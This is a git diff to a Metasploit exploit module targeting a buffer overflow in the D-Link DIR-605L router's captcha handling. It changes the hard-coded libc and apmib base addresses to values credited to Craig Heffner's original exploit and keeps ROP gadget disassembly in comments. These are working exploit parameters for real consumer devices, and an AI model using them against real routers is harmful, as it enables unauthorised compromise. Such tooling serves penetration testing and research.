diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
index 1c441c0b93..ca1b997239 100644
--- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
+++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
@@ -47,8 +47,10 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'DLink DIR-605L 1.13',
             {
               'Offset'      => 94,
-              'LibcBase'    => 0x4212e000, # QEMU environment
-              'ApmibBase'   => 0x42095000, # QEMU environment
+              'LibcBase'    => 0x2ab86000, # According to Original Exploit by Craig Heffner
+              'ApmibBase'   => 0x2aaef000, # According to Original Exploit by Craig Heffner
+              #'LibcBase'    => 0x4212e000, # QEMU environment
+              #'ApmibBase'   => 0x42095000, # QEMU environment
               #LOAD:000248D4  li      $a0, 1   ; set $a0 for the sleep() call
               #LOAD:000248D8  move    $t9, $s1 ; $s1 is controlled after the overflow
               #LOAD:000248DC  jalr    $t9